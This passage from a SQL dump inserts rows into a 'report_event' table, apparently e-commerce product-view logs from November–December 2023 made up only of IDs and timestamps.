(8182, '2023-11-20 03:39:56', 1, 2061, 0, 1, 1),
(8183, '2023-11-20 03:56:33', 4, 2061, 1338, 1, 1),
(8184, '2023-11-20 04:02:08', 1, 2061, 0, 1, 1),
(8185, '2023-11-20 04:02:12', 4, 2061, 1339, 1, 1),
(8186, '2023-11-20 04:04:53', 4, 2064, 1340, 1, 1),
(8187, '2023-11-20 04:18:38', 4, 2061, 1341, 1, 1),
(8188, '2023-11-20 04:45:50', 4, 2064, 1342, 1, 1),
(8189, '2023-11-20 10:51:19', 1, 2063, 0, 1, 1),
(8190, '2023-11-20 13:26:56', 1, 2062, 0, 1, 1),
(8191, '2023-11-20 13:30:57', 1, 2054, 0, 1, 1),
(8192, '2023-11-20 17:03:16', 1, 2054, 0, 1, 1),
(8193, '2023-11-20 18:34:45', 1, 2059, 0, 1, 1),
(8194, '2023-11-21 02:12:32', 1, 2055, 0, 1, 1),
(8195, '2023-11-21 04:04:10', 1, 2063, 0, 1, 1),
(8196, '2023-11-21 05:13:50', 1, 2061, 0, 1, 1),
(8197, '2023-11-21 07:09:44', 1, 2060, 0, 1, 1),
(8198, '2023-11-21 07:22:20', 1, 2063, 0, 1, 1),
(8199, '2023-11-21 07:54:11', 1, 2058, 0, 1, 1),
(8200, '2023-11-21 08:00:31', 1, 2061, 0, 1, 1),
(8201, '2023-11-21 08:51:53', 1, 2055, 0, 1, 1),
(8202, '2023-11-21 09:44:14', 1, 2054, 0, 1, 1),
(8203, '2023-11-21 10:19:29', 1, 2061, 0, 1, 1),
(8204, '2023-11-21 11:02:41', 1, 2063, 0, 1, 1),
(8205, '2023-11-21 11:03:57', 1, 2062, 0, 1, 1),
(8206, '2023-11-21 12:30:49', 1, 2054, 0, 1, 1),
(8207, '2023-11-21 12:47:58', 1, 2058, 0, 1, 1),
(8208, '2023-11-21 12:50:24', 1, 2059, 0, 1, 1),
(8209, '2023-11-21 13:06:00', 1, 2064, 0, 1, 1),
(8210, '2023-11-21 14:56:14', 1, 2064, 0, 1, 1),
(8211, '2023-11-21 15:18:28', 1, 2060, 0, 1, 1),
(8212, '2023-11-21 15:30:36', 1, 2063, 0, 1, 1),
(8213, '2023-11-21 16:01:19', 1, 2058, 0, 1, 1),
(8214, '2023-11-21 16:57:32', 1, 2055, 0, 1, 1),
(8215, '2023-11-21 18:14:10', 1, 2055, 0, 1, 1),
(8216, '2023-11-21 18:23:54', 1, 2060, 0, 1, 1),
(8217, '2023-11-21 18:35:59', 1, 2063, 0, 1, 1),
(8218, '2023-11-21 19:05:03', 1, 2058, 0, 1, 1),
(8219, '2023-11-21 19:20:42', 1, 2061, 0, 1, 1),
(8220, '2023-11-21 19:56:33', 1, 2055, 0, 1, 1),
(8221, '2023-11-21 21:14:27', 1, 2061, 0, 1, 1),
(8222, '2023-11-21 21:57:06', 1, 2062, 0, 1, 1),
(8223, '2023-11-21 23:10:17', 1, 2054, 0, 1, 1),
(8224, '2023-11-21 23:27:42', 1, 2059, 0, 1, 1),
(8225, '2023-11-21 23:37:15', 1, 2059, 0, 1, 1),
(8226, '2023-11-21 23:41:40', 1, 2064, 0, 1, 1),
(8227, '2023-11-22 00:53:40', 1, 2060, 0, 1, 1),
(8228, '2023-11-22 01:07:48', 1, 2063, 0, 1, 1),
(8229, '2023-11-22 01:44:02', 1, 2058, 0, 1, 1),
(8230, '2023-11-22 02:11:54', 1, 2064, 0, 1, 1),
(8231, '2023-11-22 02:41:48', 1, 2060, 0, 1, 1),
(8232, '2023-11-22 02:58:53', 1, 2061, 0, 1, 1),
(8233, '2023-11-22 03:00:00', 1, 2063, 0, 1, 1),
(8234, '2023-11-22 03:45:04', 1, 2058, 0, 1, 1),
(8235, '2023-11-22 05:01:04', 1, 2055, 0, 1, 1),
(8236, '2023-11-22 07:01:15', 1, 2061, 0, 1, 1),
(8237, '2023-11-22 07:24:13', 1, 2061, 0, 1, 1),
(8238, '2023-11-22 07:24:14', 1, 2055, 0, 1, 1),
(8239, '2023-11-22 07:24:15', 1, 2059, 0, 1, 1),
(8240, '2023-11-22 07:24:17', 1, 2054, 0, 1, 1),
(8241, '2023-11-22 07:24:18', 1, 2060, 0, 1, 1),
(8242, '2023-11-22 07:24:19', 1, 2064, 0, 1, 1),
(8243, '2023-11-22 07:24:20', 1, 2063, 0, 1, 1),
(8244, '2023-11-22 07:24:23', 1, 2062, 0, 1, 1),
(8245, '2023-11-22 07:24:23', 1, 2058, 0, 1, 1),
(8246, '2023-11-22 08:02:34', 1, 2062, 0, 1, 1),
(8247, '2023-11-22 08:44:53', 1, 2054, 0, 1, 1),
(8248, '2023-11-22 10:01:00', 1, 2054, 0, 1, 1),
(8249, '2023-11-22 10:26:48', 1, 2059, 0, 1, 1),
(8250, '2023-11-22 10:47:46', 1, 2064, 0, 1, 1),
(8251, '2023-11-22 14:19:26', 1, 2053, 0, 1, 1),
(8252, '2023-11-22 22:28:08', 1, 2053, 0, 1, 1),
(8253, '2023-11-23 03:30:35', 1, 2054, 0, 1, 1),
(8254, '2023-11-23 04:53:51', 1, 2061, 0, 1, 1),
(8255, '2023-11-23 11:15:14', 1, 2061, 0, 1, 1),
(8256, '2023-11-23 12:45:35', 1, 2053, 0, 1, 1),
(8257, '2023-11-23 13:34:05', 1, 2064, 0, 1, 1),
(8258, '2023-11-23 19:35:08', 1, 2064, 0, 1, 1),
(8259, '2023-11-24 02:02:51', 1, 2061, 0, 1, 1),
(8260, '2023-11-24 04:15:56', 1, 2062, 0, 1, 1),
(8261, '2023-11-24 06:37:09', 1, 2064, 0, 1, 1),
(8262, '2023-11-24 13:26:44', 1, 2059, 0, 1, 1),
(8263, '2023-11-24 14:07:58', 1, 2058, 0, 1, 1),
(8264, '2023-11-24 14:09:19', 1, 2061, 0, 1, 1),
(8265, '2023-11-24 17:35:23', 1, 2059, 0, 1, 1),
(8266, '2023-11-24 18:41:16', 1, 2058, 0, 1, 1),
(8267, '2023-11-24 19:46:17', 1, 2062, 0, 1, 1),
(8268, '2023-11-24 19:46:22', 1, 2062, 0, 1, 1),
(8269, '2023-11-24 23:12:27', 1, 2054, 0, 1, 1),
(8270, '2023-11-25 00:36:29', 1, 2061, 0, 1, 1),
(8271, '2023-11-25 03:01:09', 1, 2059, 0, 1, 1),
(8272, '2023-11-25 03:36:27', 1, 2059, 0, 1, 1),
(8273, '2023-11-25 05:50:34', 1, 2062, 0, 1, 1),
(8274, '2023-11-25 07:30:07', 1, 2061, 0, 1, 1),
(8275, '2023-11-25 08:18:17', 1, 2063, 0, 1, 1),
(8276, '2023-11-25 08:18:17', 1, 2054, 0, 1, 1),
(8277, '2023-11-25 08:18:20', 1, 2055, 0, 1, 1),
(8278, '2023-11-25 08:18:20', 1, 2059, 0, 1, 1),
(8279, '2023-11-25 08:18:20', 1, 2062, 0, 1, 1),
(8280, '2023-11-25 08:18:25', 1, 2058, 0, 1, 1),
(8281, '2023-11-25 08:18:30', 1, 2060, 0, 1, 1),
(8282, '2023-11-25 08:18:34', 1, 2061, 0, 1, 1),
(8283, '2023-11-25 08:18:35', 1, 2064, 0, 1, 1),
(8284, '2023-11-25 09:06:04', 1, 2062, 0, 1, 1),
(8285, '2023-11-25 09:19:39', 1, 2061, 0, 1, 1),
(8286, '2023-11-25 09:24:19', 1, 2054, 0, 1, 1),
(8287, '2023-11-25 11:50:37', 1, 2064, 0, 1, 1),
(8288, '2023-11-25 11:50:56', 1, 2064, 0, 1, 1),
(8289, '2023-11-25 15:07:06', 1, 2064, 0, 1, 1),
(8290, '2023-11-25 16:16:27', 1, 2061, 0, 1, 1),
(8291, '2023-11-26 01:25:46', 1, 2060, 0, 1, 1),
(8292, '2023-11-26 01:33:31', 1, 2059, 0, 1, 1),
(8293, '2023-11-26 01:38:18', 1, 2063, 0, 1, 1),
(8294, '2023-11-26 02:34:42', 1, 2060, 0, 1, 1),
(8295, '2023-11-26 02:47:08', 1, 2063, 0, 1, 1),
(8296, '2023-11-26 03:18:57', 1, 2058, 0, 1, 1),
(8297, '2023-11-26 03:58:17', 1, 2062, 0, 1, 1),
(8298, '2023-11-26 03:59:40', 1, 2063, 0, 1, 1),
(8299, '2023-11-26 04:14:03', 1, 2055, 0, 1, 1),
(8300, '2023-11-26 05:38:03', 1, 2061, 0, 1, 1),
(8301, '2023-11-26 06:21:46', 1, 2062, 0, 1, 1),
(8302, '2023-11-26 07:09:26', 1, 2055, 0, 1, 1),
(8303, '2023-11-26 07:09:26', 1, 2054, 0, 1, 1),
(8304, '2023-11-26 07:09:36', 1, 2064, 0, 1, 1),
(8305, '2023-11-26 07:09:39', 1, 2063, 0, 1, 1),
(8306, '2023-11-26 07:09:40', 1, 2060, 0, 1, 1),
(8307, '2023-11-26 07:09:40', 1, 2062, 0, 1, 1),
(8308, '2023-11-26 07:09:42', 1, 2059, 0, 1, 1),
(8309, '2023-11-26 07:09:43', 1, 2061, 0, 1, 1),
(8310, '2023-11-26 07:09:45', 1, 2058, 0, 1, 1),
(8311, '2023-11-26 07:45:14', 1, 2054, 0, 1, 1),
(8312, '2023-11-26 08:03:52', 1, 2059, 0, 1, 1),
(8313, '2023-11-26 08:18:43', 1, 2064, 0, 1, 1),
(8314, '2023-11-26 09:00:07', 1, 2061, 0, 1, 1),
(8315, '2023-11-26 10:26:52', 1, 2064, 0, 1, 1),
(8316, '2023-11-26 11:05:24', 1, 2062, 0, 1, 1),
(8317, '2023-11-26 11:08:50', 1, 2055, 0, 1, 1),
(8318, '2023-11-26 12:53:35', 1, 2064, 0, 1, 1),
(8319, '2023-11-26 16:31:59', 1, 2053, 0, 1, 1),
(8320, '2023-11-26 17:45:58', 1, 2053, 0, 1, 1),
(8321, '2023-11-26 18:35:08', 1, 2062, 0, 1, 1),
(8322, '2023-11-26 18:41:06', 1, 2059, 0, 1, 1),
(8323, '2023-11-27 00:10:22', 1, 2061, 0, 1, 1),
(8324, '2023-11-27 02:04:42', 1, 2060, 0, 1, 1),
(8325, '2023-11-27 02:18:27', 1, 2063, 0, 1, 1),
(8326, '2023-11-27 02:52:34', 1, 2058, 0, 1, 1),
(8327, '2023-11-27 02:58:10', 1, 2060, 0, 1, 1),
(8328, '2023-11-27 02:58:12', 1, 2064, 0, 1, 1),
(8329, '2023-11-27 04:11:36', 1, 2060, 0, 1, 1),
(8330, '2023-11-27 04:23:39', 1, 2063, 0, 1, 1),
(8331, '2023-11-27 04:54:30', 1, 2058, 0, 1, 1),
(8332, '2023-11-27 05:48:12', 1, 2055, 0, 1, 1),
(8333, '2023-11-27 07:13:47', 1, 2060, 0, 1, 1),
(8334, '2023-11-27 07:32:29', 1, 2063, 0, 1, 1),
(8335, '2023-11-27 08:22:06', 1, 2058, 0, 1, 1),
(8336, '2023-11-27 09:48:47', 1, 2055, 0, 1, 1),
(8337, '2023-11-27 12:03:20', 1, 2061, 0, 1, 1),
(8338, '2023-11-27 12:04:28', 1, 2061, 0, 1, 1),
(8339, '2023-11-27 13:13:39', 1, 2062, 0, 1, 1),
(8340, '2023-11-27 14:43:07', 1, 2062, 0, 1, 1),
(8341, '2023-11-27 15:25:53', 1, 2054, 0, 1, 1),
(8342, '2023-11-27 15:33:31', 1, 2064, 0, 1, 1),
(8343, '2023-11-27 15:54:44', 1, 2059, 0, 1, 1),
(8344, '2023-11-27 16:17:55', 1, 2064, 0, 1, 1),
(8345, '2023-11-27 16:44:15', 1, 2060, 0, 1, 1),
(8346, '2023-11-27 19:20:00', 1, 2053, 0, 1, 1),
(8347, '2023-11-27 19:20:17', 1, 2054, 0, 1, 1),
(8348, '2023-11-27 19:20:57', 1, 2055, 0, 1, 1),
(8349, '2023-11-27 19:22:03', 1, 2064, 0, 1, 1),
(8350, '2023-11-27 19:22:08', 1, 2063, 0, 1, 1),
(8351, '2023-11-27 19:22:12', 1, 2062, 0, 1, 1),
(8352, '2023-11-27 19:22:16', 1, 2060, 0, 1, 1),
(8353, '2023-11-27 19:22:21', 1, 2059, 0, 1, 1),
(8354, '2023-11-27 19:22:25', 1, 2061, 0, 1, 1),
(8355, '2023-11-27 19:22:29', 1, 2058, 0, 1, 1),
(8356, '2023-11-27 19:40:45', 1, 2058, 0, 1, 1),
(8357, '2023-11-27 19:40:55', 1, 2061, 0, 1, 1),
(8358, '2023-11-27 19:41:06', 1, 2059, 0, 1, 1),
(8359, '2023-11-27 19:41:15', 1, 2060, 0, 1, 1),
(8360, '2023-11-27 19:41:25', 1, 2062, 0, 1, 1),
(8361, '2023-11-27 19:41:31', 1, 2063, 0, 1, 1),
(8362, '2023-11-27 19:41:40', 1, 2064, 0, 1, 1),
(8363, '2023-11-27 19:42:24', 1, 2055, 0, 1, 1),
(8364, '2023-11-27 19:42:27', 1, 2054, 0, 1, 1),
(8365, '2023-11-27 19:42:31', 1, 2053, 0, 1, 1),
(8366, '2023-11-27 22:50:13', 1, 2060, 0, 1, 1),
(8367, '2023-11-28 00:48:06', 1, 2064, 0, 1, 1),
(8368, '2023-11-28 00:48:09', 1, 2064, 0, 1, 1),
(8369, '2023-11-28 00:48:12', 1, 2064, 0, 1, 1),
(8370, '2023-11-28 00:48:14', 1, 2063, 0, 1, 1),
(8371, '2023-11-28 00:48:17', 1, 2062, 0, 1, 1),
(8372, '2023-11-28 00:48:19', 1, 2061, 0, 1, 1),
(8373, '2023-11-28 00:48:21', 1, 2060, 0, 1, 1),
(8374, '2023-11-28 00:48:24', 1, 2059, 0, 1, 1),
(8375, '2023-11-28 00:48:26', 1, 2058, 0, 1, 1),
(8376, '2023-11-28 00:48:29', 1, 2055, 0, 1, 1),
(8377, '2023-11-28 00:48:31', 1, 2054, 0, 1, 1),
(8378, '2023-11-28 01:44:14', 1, 2054, 0, 1, 1),
(8379, '2023-11-28 05:47:25', 1, 2054, 0, 1, 1),
(8380, '2023-11-28 05:47:26', 1, 2064, 0, 1, 1),
(8381, '2023-11-28 06:31:10', 1, 2063, 0, 1, 1),
(8382, '2023-11-28 08:34:35', 1, 2062, 0, 1, 1),
(8383, '2023-11-28 08:34:40', 1, 2060, 0, 1, 1),
(8384, '2023-11-28 08:34:42', 1, 2059, 0, 1, 1),
(8385, '2023-11-28 08:34:44', 1, 2061, 0, 1, 1),
(8386, '2023-11-28 08:34:48', 1, 2064, 0, 1, 1),
(8387, '2023-11-28 08:34:51', 1, 2055, 0, 1, 1),
(8388, '2023-11-28 08:34:52', 1, 2058, 0, 1, 1),
(8389, '2023-11-28 08:39:43', 1, 2063, 0, 1, 1),
(8390, '2023-11-28 08:39:43', 1, 2054, 0, 1, 1),
(8391, '2023-11-28 09:09:45', 1, 2054, 0, 1, 1),
(8392, '2023-11-28 10:06:28', 1, 2061, 0, 1, 1),
(8393, '2023-11-28 12:15:12', 1, 2064, 0, 1, 1),
(8394, '2023-11-28 12:23:42', 1, 2061, 0, 1, 1),
(8395, '2023-11-28 17:40:23', 1, 2062, 0, 1, 1),
(8396, '2023-11-28 20:41:21', 1, 2064, 0, 1, 1),
(8397, '2023-11-28 22:33:53', 1, 2059, 0, 1, 1),
(8398, '2023-11-28 23:29:32', 1, 2064, 0, 1, 1),
(8399, '2023-11-29 02:53:13', 1, 2054, 0, 1, 1),
(8400, '2023-11-29 06:09:49', 1, 2059, 0, 1, 1),
(8401, '2023-11-29 06:17:27', 1, 2055, 0, 1, 1),
(8402, '2023-11-29 06:34:17', 1, 2060, 0, 1, 1),
(8403, '2023-11-29 08:44:15', 1, 2063, 0, 1, 1),
(8404, '2023-11-29 20:11:15', 1, 2053, 0, 1, 1),
(8405, '2023-11-30 01:58:41', 1, 2064, 0, 1, 1),
(8406, '2023-11-30 02:26:04', 1, 2055, 0, 1, 1),
(8407, '2023-11-30 02:48:11', 1, 2058, 0, 1, 1),
(8408, '2023-11-30 02:49:02', 1, 2061, 0, 1, 1),
(8409, '2023-11-30 02:49:51', 1, 2060, 0, 1, 1),
(8410, '2023-11-30 02:50:33', 1, 2059, 0, 1, 1),
(8411, '2023-11-30 02:51:36', 1, 2063, 0, 1, 1),
(8412, '2023-11-30 02:52:26', 1, 2062, 0, 1, 1),
(8413, '2023-11-30 02:53:25', 1, 2064, 0, 1, 1),
(8414, '2023-11-30 02:58:54', 1, 2054, 0, 1, 1),
(8415, '2023-11-30 03:41:50', 1, 2053, 0, 1, 1),
(8416, '2023-11-30 04:42:24', 1, 2053, 0, 1, 1),
(8417, '2023-11-30 05:23:07', 1, 2061, 0, 1, 1),
(8418, '2023-11-30 08:44:15', 1, 2063, 0, 1, 1),
(8419, '2023-11-30 11:15:02', 1, 2063, 0, 1, 1),
(8420, '2023-11-30 11:25:25', 1, 2058, 0, 1, 1),
(8421, '2023-11-30 13:03:50', 1, 2053, 0, 1, 1),
(8422, '2023-11-30 15:14:42', 1, 2063, 0, 1, 1),
(8423, '2023-11-30 23:56:24', 1, 2060, 0, 1, 1),
(8424, '2023-12-01 04:17:19', 1, 2064, 0, 1, 1),
(8425, '2023-12-01 04:49:39', 1, 2061, 0, 1, 1),
(8426, '2023-12-01 06:11:58', 1, 2059, 0, 1, 1),
(8427, '2023-12-01 06:23:39', 1, 2062, 0, 1, 1),
(8428, '2023-12-01 07:14:09', 1, 2061, 0, 1, 1),
(8429, '2023-12-01 08:47:33', 1, 2060, 0, 1, 1),
(8430, '2023-12-01 13:06:36', 1, 2061, 0, 1, 1),
(8431, '2023-12-01 15:29:43', 1, 2060, 0, 1, 1),
(8432, '2023-12-01 15:29:59', 1, 2064, 0, 1, 1),
(8433, '2023-12-01 18:14:17', 1, 2060, 0, 1, 1),
(8434, '2023-12-01 20:42:46', 1, 2053, 0, 1, 1),
(8435, '2023-12-01 23:56:26', 1, 2060, 0, 1, 1),
(8436, '2023-12-02 03:29:05', 1, 2062, 0, 1, 1),
(8437, '2023-12-02 04:52:22', 1, 2060, 0, 1, 1),
(8438, '2023-12-02 05:13:25', 1, 2053, 0, 1, 1),
(8439, '2023-12-02 05:52:32', 1, 2058, 0, 1, 1),
(8440, '2023-12-02 05:53:43', 1, 2062, 0, 1, 1),
(8441, '2023-12-02 06:35:59', 1, 2058, 0, 1, 1),
(8442, '2023-12-02 11:03:47', 1, 2063, 0, 1, 1),
(8443, '2023-12-02 11:46:51', 1, 2059, 0, 1, 1),
(8444, '2023-12-02 13:12:59', 1, 2060, 0, 1, 1),
(8445, '2023-12-02 15:00:13', 1, 2064, 0, 1, 1),
(8446, '2023-12-02 15:18:30', 1, 2063, 0, 1, 1),
(8447, '2023-12-02 18:18:37', 1, 2061, 0, 1, 1),
(8448, '2023-12-02 19:01:26', 1, 2064, 0, 1, 1),
(8449, '2023-12-02 19:25:36', 1, 2054, 0, 1, 1),
(8450, '2023-12-02 19:29:40', 1, 2061, 0, 1, 1),
(8451, '2023-12-02 19:56:44', 1, 2055, 0, 1, 1),
(8452, '2023-12-02 23:21:15', 1, 2062, 0, 1, 1),
(8453, '2023-12-03 02:31:58', 1, 2055, 0, 1, 1),
(8454, '2023-12-03 06:04:17', 1, 2058, 0, 1, 1),
(8455, '2023-12-03 08:17:01', 1, 2059, 0, 1, 1),
(8456, '2023-12-03 10:43:56', 1, 2064, 0, 1, 1),
(8457, '2023-12-03 13:50:32', 1, 2058, 0, 1, 1),
(8458, '2023-12-03 15:28:26', 1, 2059, 0, 1, 1),
(8459, '2023-12-03 15:44:08', 1, 2054, 0, 1, 1),
(8460, '2023-12-03 16:17:58', 1, 2063, 0, 1, 1),
(8461, '2023-12-03 16:47:15', 1, 2061, 0, 1, 1),
(8462, '2023-12-04 02:02:24', 1, 2061, 0, 1, 1),
(8463, '2023-12-04 02:02:31', 1, 2061, 0, 1, 1),
(8464, '2023-12-04 06:39:51', 1, 2061, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(8465, '2023-12-04 07:01:04', 1, 2055, 0, 1, 1),
(8466, '2023-12-04 09:36:17', 1, 2059, 0, 1, 1),
(8467, '2023-12-04 12:37:46', 1, 2061, 0, 1, 1),
(8468, '2023-12-04 14:02:28', 1, 2062, 0, 1, 1),
(8469, '2023-12-04 14:17:57', 1, 2064, 0, 1, 1),
(8470, '2023-12-04 16:42:05', 1, 2059, 0, 1, 1),
(8471, '2023-12-04 20:39:03', 1, 2061, 0, 1, 1),
(8472, '2023-12-05 03:25:51', 1, 2061, 0, 1, 1),
(8473, '2023-12-05 03:26:23', 1, 2064, 0, 1, 1),
(8474, '2023-12-05 04:52:33', 1, 2055, 0, 1, 1),
(8475, '2023-12-05 04:53:56', 1, 2054, 0, 1, 1),
(8476, '2023-12-05 04:55:18', 1, 2053, 0, 1, 1),
(8477, '2023-12-05 05:22:54', 1, 2059, 0, 1, 1),
(8478, '2023-12-05 07:43:53', 1, 2059, 0, 1, 1),
(8479, '2023-12-05 08:08:25', 1, 2055, 0, 1, 1),
(8480, '2023-12-05 08:22:45', 1, 2055, 0, 1, 1),
(8481, '2023-12-05 09:56:07', 1, 2064, 0, 1, 1),
(8482, '2023-12-05 10:02:36', 1, 2064, 0, 1, 1),
(8483, '2023-12-05 14:52:00', 1, 2064, 0, 1, 1),
(8484, '2023-12-05 16:43:32', 1, 2063, 0, 1, 1),
(8485, '2023-12-05 20:50:02', 1, 2060, 0, 1, 1),
(8486, '2023-12-05 21:27:06', 1, 2061, 0, 1, 1),
(8487, '2023-12-05 23:33:15', 1, 2055, 0, 1, 1),
(8488, '2023-12-05 23:34:19', 1, 2061, 0, 1, 1),
(8489, '2023-12-05 23:35:24', 1, 2064, 0, 1, 1),
(8490, '2023-12-05 23:36:31', 1, 2053, 0, 1, 1),
(8491, '2023-12-05 23:37:34', 1, 2054, 0, 1, 1),
(8492, '2023-12-05 23:41:40', 1, 2060, 0, 1, 1),
(8493, '2023-12-05 23:42:27', 1, 2058, 0, 1, 1),
(8494, '2023-12-05 23:42:39', 1, 2063, 0, 1, 1),
(8495, '2023-12-05 23:43:33', 1, 2062, 0, 1, 1),
(8496, '2023-12-05 23:44:35', 1, 2061, 0, 1, 1),
(8497, '2023-12-06 02:01:49', 1, 2061, 0, 1, 1),
(8498, '2023-12-06 04:31:16', 1, 2059, 0, 1, 1),
(8499, '2023-12-06 04:31:18', 1, 2059, 0, 1, 1),
(8500, '2023-12-06 09:58:35', 1, 2060, 0, 1, 1),
(8501, '2023-12-06 13:25:14', 1, 2059, 0, 1, 1),
(8502, '2023-12-06 13:45:03', 1, 2060, 0, 1, 1),
(8503, '2023-12-06 14:39:53', 1, 2059, 0, 1, 1),
(8504, '2023-12-07 03:52:32', 1, 2059, 0, 1, 1),
(8505, '2023-12-07 05:12:59', 1, 2063, 0, 1, 1),
(8506, '2023-12-07 06:48:57', 1, 2055, 0, 1, 1),
(8507, '2023-12-07 11:56:04', 1, 2060, 0, 1, 1),
(8508, '2023-12-07 12:02:04', 1, 2063, 0, 1, 1),
(8509, '2023-12-07 12:02:31', 1, 2053, 0, 1, 1),
(8510, '2023-12-07 17:49:51', 1, 2064, 0, 1, 1),
(8511, '2023-12-07 18:01:32', 1, 2062, 0, 1, 1),
(8512, '2023-12-07 18:54:03', 1, 2060, 0, 1, 1),
(8513, '2023-12-08 00:01:37', 1, 2064, 0, 1, 1),
(8514, '2023-12-08 03:28:29', 1, 2059, 0, 1, 1),
(8515, '2023-12-08 04:53:10', 1, 2058, 0, 1, 1),
(8516, '2023-12-08 04:54:36', 1, 2061, 0, 1, 1),
(8517, '2023-12-08 11:49:57', 1, 2054, 0, 1, 1),
(8518, '2023-12-08 13:50:53', 1, 2064, 0, 1, 1),
(8519, '2023-12-08 14:00:14', 1, 2063, 0, 1, 1),
(8520, '2023-12-08 14:53:57', 1, 2063, 0, 1, 1),
(8521, '2023-12-08 15:17:15', 1, 2063, 0, 1, 1),
(8522, '2023-12-08 15:48:44', 1, 2060, 0, 1, 1),
(8523, '2023-12-08 16:47:21', 1, 2064, 0, 1, 1),
(8524, '2023-12-08 17:17:25', 1, 2054, 0, 1, 1),
(8525, '2023-12-08 17:45:16', 1, 2064, 0, 1, 1),
(8526, '2023-12-08 17:45:18', 1, 2064, 0, 1, 1),
(8527, '2023-12-08 17:45:21', 1, 2064, 0, 1, 1),
(8528, '2023-12-08 17:45:23', 1, 2064, 0, 1, 1),
(8529, '2023-12-08 17:45:26', 1, 2063, 0, 1, 1),
(8530, '2023-12-08 17:45:28', 1, 2063, 0, 1, 1),
(8531, '2023-12-08 17:45:30', 1, 2062, 0, 1, 1),
(8532, '2023-12-08 17:45:32', 1, 2062, 0, 1, 1),
(8533, '2023-12-08 17:45:34', 1, 2061, 0, 1, 1),
(8534, '2023-12-08 17:45:36', 1, 2061, 0, 1, 1),
(8535, '2023-12-08 17:45:38', 1, 2060, 0, 1, 1),
(8536, '2023-12-08 17:45:40', 1, 2060, 0, 1, 1),
(8537, '2023-12-08 17:45:42', 1, 2059, 0, 1, 1),
(8538, '2023-12-08 17:45:45', 1, 2059, 0, 1, 1),
(8539, '2023-12-08 17:45:46', 1, 2058, 0, 1, 1),
(8540, '2023-12-08 17:45:48', 1, 2058, 0, 1, 1),
(8541, '2023-12-08 17:45:50', 1, 2055, 0, 1, 1),
(8542, '2023-12-08 17:45:52', 1, 2055, 0, 1, 1),
(8543, '2023-12-08 17:45:54', 1, 2061, 0, 1, 1),
(8544, '2023-12-08 17:45:56', 1, 2061, 0, 1, 1),
(8545, '2023-12-08 17:45:59', 1, 2059, 0, 1, 1),
(8546, '2023-12-08 17:46:00', 1, 2059, 0, 1, 1),
(8547, '2023-12-08 17:46:03', 1, 2058, 0, 1, 1),
(8548, '2023-12-08 17:46:05', 1, 2058, 0, 1, 1),
(8549, '2023-12-08 17:46:08', 1, 2054, 0, 1, 1),
(8550, '2023-12-08 17:46:11', 1, 2054, 0, 1, 1),
(8551, '2023-12-08 17:46:14', 1, 2064, 0, 1, 1),
(8552, '2023-12-08 17:46:17', 1, 2064, 0, 1, 1),
(8553, '2023-12-08 17:46:19', 1, 2064, 0, 1, 1),
(8554, '2023-12-08 17:46:23', 1, 2063, 0, 1, 1),
(8555, '2023-12-08 17:46:25', 1, 2063, 0, 1, 1),
(8556, '2023-12-08 17:46:29', 1, 2062, 0, 1, 1),
(8557, '2023-12-08 17:46:31', 1, 2062, 0, 1, 1),
(8558, '2023-12-08 17:46:34', 1, 2061, 0, 1, 1),
(8559, '2023-12-08 17:46:36', 1, 2061, 0, 1, 1),
(8560, '2023-12-08 18:12:45', 1, 2060, 0, 1, 1),
(8561, '2023-12-08 18:26:36', 1, 2064, 0, 1, 1),
(8562, '2023-12-08 20:06:38', 1, 2054, 0, 1, 1),
(8563, '2023-12-09 01:24:56', 1, 2061, 0, 1, 1),
(8564, '2023-12-09 02:05:49', 1, 2055, 0, 1, 1),
(8565, '2023-12-09 03:33:06', 1, 2059, 0, 1, 1),
(8566, '2023-12-09 03:59:02', 1, 2062, 0, 1, 1),
(8567, '2023-12-09 05:51:31', 1, 2059, 0, 1, 1),
(8568, '2023-12-09 06:50:00', 1, 2061, 0, 1, 1),
(8569, '2023-12-09 06:50:04', 1, 2064, 0, 1, 1),
(8570, '2023-12-09 06:50:12', 1, 2061, 0, 1, 1),
(8571, '2023-12-09 09:01:11', 1, 2058, 0, 1, 1),
(8572, '2023-12-09 14:29:18', 1, 2059, 0, 1, 1),
(8573, '2023-12-09 16:01:00', 1, 2062, 0, 1, 1),
(8574, '2023-12-09 16:01:01', 1, 2062, 0, 1, 1),
(8575, '2023-12-09 17:47:47', 1, 2061, 0, 1, 1),
(8576, '2023-12-09 17:47:48', 1, 2064, 0, 1, 1),
(8577, '2023-12-09 17:48:26', 1, 2064, 0, 1, 1),
(8578, '2023-12-10 05:11:59', 1, 2059, 0, 1, 1),
(8579, '2023-12-10 11:51:21', 1, 2055, 0, 1, 1),
(8580, '2023-12-10 13:58:49', 1, 2058, 0, 1, 1),
(8581, '2023-12-10 15:31:14', 1, 2061, 0, 1, 1),
(8582, '2023-12-10 17:49:14', 1, 2061, 0, 1, 1),
(8583, '2023-12-10 17:49:14', 1, 2061, 0, 1, 1),
(8584, '2023-12-10 17:49:15', 1, 2061, 0, 1, 1),
(8585, '2023-12-10 17:49:17', 1, 2061, 0, 1, 1),
(8586, '2023-12-10 17:49:17', 1, 2061, 0, 1, 1),
(8587, '2023-12-10 21:49:23', 1, 2063, 0, 1, 1),
(8588, '2023-12-10 23:24:18', 1, 2055, 0, 1, 1),
(8589, '2023-12-11 03:55:32', 1, 2062, 0, 1, 1),
(8590, '2023-12-11 12:01:47', 1, 2060, 0, 1, 1),
(8591, '2023-12-11 12:24:16', 1, 2060, 0, 1, 1),
(8592, '2023-12-11 15:57:55', 1, 2055, 0, 1, 1),
(8593, '2023-12-11 18:19:08', 1, 2064, 0, 1, 1),
(8594, '2023-12-11 18:38:54', 1, 2053, 0, 1, 1),
(8595, '2023-12-11 21:29:51', 1, 2062, 0, 1, 1),
(8596, '2023-12-12 03:57:53', 1, 2062, 0, 1, 1),
(8597, '2023-12-12 03:57:56', 1, 2062, 0, 1, 1),
(8598, '2023-12-12 03:58:00', 1, 2062, 0, 1, 1),
(8599, '2023-12-12 07:04:36', 1, 2064, 0, 1, 1),
(8600, '2023-12-12 08:01:54', 1, 2059, 0, 1, 1),
(8601, '2023-12-12 11:49:15', 1, 2055, 0, 1, 1),
(8602, '2023-12-12 11:50:41', 1, 2054, 0, 1, 1),
(8603, '2023-12-12 13:45:21', 1, 2064, 0, 1, 1),
(8604, '2023-12-12 20:09:46', 1, 2055, 0, 1, 1),
(8605, '2023-12-12 20:09:56', 1, 2064, 0, 1, 1),
(8606, '2023-12-12 20:09:59', 1, 2063, 0, 1, 1),
(8607, '2023-12-12 20:10:07', 1, 2062, 0, 1, 1),
